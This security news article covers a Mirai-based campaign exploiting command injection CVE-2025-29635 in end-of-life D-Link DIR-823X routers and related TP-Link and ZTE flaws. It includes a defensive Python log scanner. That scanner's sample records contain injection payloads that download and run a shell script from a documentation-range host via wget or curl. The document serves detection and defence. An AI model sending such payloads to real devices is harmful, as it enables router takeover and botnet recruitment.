Mirai Campaign Exploits RCE Flaw in Obsolete D-Link Routers

"The Akamai SIRT discovered active exploitation attempts of the D-Link command injection vulnerability CVE-2025-29635 in our global network of honeypots in early March 2026," reads Akamai's report.

Akamai SIRT's March 2026 detection

Akamai's Security Incident Response Team (SIRT) reported discovering live exploitation attempts against CVE-2025-29635 in early March 2026. According to Akamai, the activity was observed across its global honeypot network and involved automated POST requests targeting D-Link DIR-823X series routers running firmware versions 240126 and 24082. The team describes the activity as an in-the-wild Mirai-based campaign that enlists vulnerable devices into a botnet.

How CVE-2025-29635 is being weaponized

CVE-2025-29635 is a command-injection flaw in the /goform/set_prohibiting endpoint of affected DIR-823X devices: a crafted POST request to that endpoint causes the router to run attacker-supplied shell commands, no authentication bypass or memory corruption required. Akamai's report describes the injected command sequence as changing into a writable directory, downloading a shell script named dlink.sh from an external IP address, and executing it. That chain, a POST to the endpoint, a cd into a writable path, then download and execution of dlink.sh, is the observed exploitation pattern that yields remote code execution (RCE) on the router.

The payload: Mirai-based "tuxnokill" and DDoS capabilities

Once the shell script runs, it installs Mirai-based malware that the researchers identified as "tuxnokill." Akamai notes that tuxnokill is built for multiple CPU architectures and carries Mirai's standard distributed denial-of-service (DDoS) repertoire: TCP SYN, ACK and STOMP floods, UDP floods, and HTTP null floods. The same delivery chain, a Mirai payload dropped after RCE, was observed across every router family targeted in the campaign.

Related exploitation of TP-Link and ZTE router flaws

Akamai also found the same attack approach applied to other router vulnerabilities: the actor behind this campaign has been exploiting CVE-2023-1389, a flaw in TP-Link routers, and a separate RCE weakness in ZTE ZXV10 H108L routers. In each case Akamai describes the behavior as matching the DIR-823X chain: RCE via an HTTP request, download of a script from an external host, and deployment of a Mirai payload.

What this means for DIR-823X owners, security teams, and D‑Link

  • DIR-823X owners (end users): The affected DIR-823X models reached end of life (EoL) in November 2024, so the latest firmware published for them likely does not remediate CVE-2025-29635. BleepingComputer reports that D-Link does not make exceptions to its EoL policy even when active exploitation is detected, so a vendor patch is considered unlikely. The reporting recommends replacing the router with a model that still receives security updates; until that happens, disable remote (WAN-side) administration if it is not needed, change the default administrative password, and watch for unexpected configuration changes.
  • Security teams and technologists: The campaign demonstrates a repeatable exploitation pattern across multiple router families that defenders should watch for: POST-based command injection to a configuration endpoint, a cd into a writable directory, download and execution of a shell script fetched from an external host (dlink.sh-like artifacts), and installation of a Mirai-class binary. Detection rules that flag outbound retrievals of shell scripts from unusual external IPs, unexpected requests to router configuration endpoints, and new Mirai-like traffic patterns (TCP SYN/ACK/STOMP floods, UDP floods, HTTP null floods) will be directly relevant.
  • D‑Link (the vendor): The reporting notes that D-Link's stated policy is not to make exceptions for EoL devices even when active exploitation is observed. That posture, combined with the EoL date of November 2024, is presented as the reason a vendor patch is unlikely for these DIR-823X models. BleepingComputer has contacted D-Link for comment on the activity and the status of any fix and said it will update the story if the vendor responds.
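The exploitation chain described above and the detection guidance for security teams can be turned into a simple check over HTTP request logs. The Python below is an added example, not Akamai's or D-Link's code. It classifies each request by the indicators the report names (POST to /goform/set_prohibiting, shell metacharacters in a form value, a cd into an absolute path, a download utility with a URL argument, and execution of the fetched script), and it deliberately does not require the DIR-823X endpoint for the "exploit attempt" verdict, so the same logic covers the TP-Link and ZTE variants of the pattern. The log records are constructed, the form field name `mode` and the second endpoint path `/cgi-bin/example` are assumptions (the page names neither), and the IP addresses come from the RFC 5737 documentation ranges.

```python
import re
from urllib.parse import unquote_plus

# Endpoint named in Akamai's report for the DIR-823X command injection.
TARGET_ENDPOINTS = {"/goform/set_prohibiting"}

# Shell metacharacters that end the intended argument and start a new
# command; their presence in a form value is the core injection signal.
SHELL_META = re.compile(r"[;&|`\n]|\$\(")
# "cd /<path>" invoked as its own command: moving to a writable directory.
CD_RE = re.compile(r"(?:^|[;&|\s(])cd\s+/")
# A download utility invoked as a command, plus a URL argument for it.
FETCH_RE = re.compile(r"(?:^|[;&|\s(])(?:wget|curl|tftp)\b")
URL_RE = re.compile(r"https?://[^\s;&|'\"<>)]+")
# "sh <file>", "bash <file>" or "./<file>" invoked as a command.
EXEC_RE = re.compile(r"(?:^|[;&|\s(])(?:(?:sh|bash)\b|\./\S+)")


def classify(rec):
    """Score one HTTP request record and return a finding dict.

    rec has keys src, method, path, body; body may be URL-encoded, as a
    router's form handler would receive it, so it is decoded first.
    """
    body = unquote_plus(rec.get("body") or "")
    reasons = []
    if rec.get("method") == "POST" and rec.get("path") in TARGET_ENDPOINTS:
        reasons.append("target_endpoint")
    if SHELL_META.search(body):
        reasons.append("shell_metachar")
    if CD_RE.search(body):
        reasons.append("cd_to_writable_dir")
    urls = URL_RE.findall(body)
    if FETCH_RE.search(body) and urls:
        reasons.append("remote_fetch")
    if EXEC_RE.search(body):
        reasons.append("script_exec")

    have = set(reasons)
    if {"shell_metachar", "remote_fetch", "script_exec"} <= have:
        verdict = "exploit_attempt"      # full download-and-execute chain
    elif {"shell_metachar", "target_endpoint"} <= have:
        verdict = "injection_attempt"    # injection at the known endpoint
    elif "target_endpoint" in have:
        verdict = "endpoint_hit"         # worth noting on an EoL device
    else:
        verdict = "benign"
    return {"src": rec.get("src"), "path": rec.get("path"),
            "verdict": verdict, "reasons": reasons, "urls": urls}


def scan(records):
    """Return findings for every record that is not benign."""
    return [f for f in (classify(r) for r in records) if f["verdict"] != "benign"]


# Constructed sample records (not real honeypot data). The field name
# "mode" and the path "/cgi-bin/example" are assumptions for illustration.
SAMPLE_LOG = [
    {"src": "203.0.113.50", "method": "GET",
     "path": "/index.html", "body": ""},
    {"src": "192.0.2.7", "method": "POST",
     "path": "/goform/set_prohibiting", "body": "mode=1"},
    # URL-encoded form of: mode=1;cd /tmp;wget http://203.0.113.10/dlink.sh;
    #                      chmod +x dlink.sh;sh dlink.sh
    {"src": "198.51.100.9", "method": "POST",
     "path": "/goform/set_prohibiting",
     "body": "mode=1%3Bcd+%2Ftmp%3Bwget+http%3A%2F%2F203.0.113.10%2Fdlink.sh"
             "%3Bchmod+%2Bx+dlink.sh%3Bsh+dlink.sh"},
    # Same chain via command substitution against a different endpoint.
    {"src": "198.51.100.22", "method": "POST", "path": "/cgi-bin/example",
     "body": "country=$(cd /tmp; curl http://203.0.113.10/t.sh | sh)"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["src"], finding["path"], finding["verdict"],
              ",".join(finding["reasons"]), finding["urls"])
```

The extracted URLs are the most useful pivot: the host that serves dlink.sh is the same host the router will connect back to, so blocking or alerting on outbound fetches from router management interfaces to that address catches the campaign even if the request body is not logged.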

The vulnerability was originally disclosed by security researchers Wang Jinshuai and Zhao Jiangting about 13 months before Akamai's detection; the pair briefly published a proof-of-concept (PoC) exploit on GitHub and later retracted it. Akamai's March 2026 observations mark, according to the company, the first time active exploitation of CVE-2025-29635 has been seen in the wild.

This campaign underscores a basic but consequential dynamic: devices that have reached EoL remain powered on and reachable from the internet, and attackers reuse automation that works against one router family against the next. For DIR-823X owners the practical mitigation is replacing or isolating the device; for defenders it means hunting for the technical chain Akamai outlined.

Source: BleepingComputer — New Mirai campaign exploits RCE flaw in EoL D-Link routers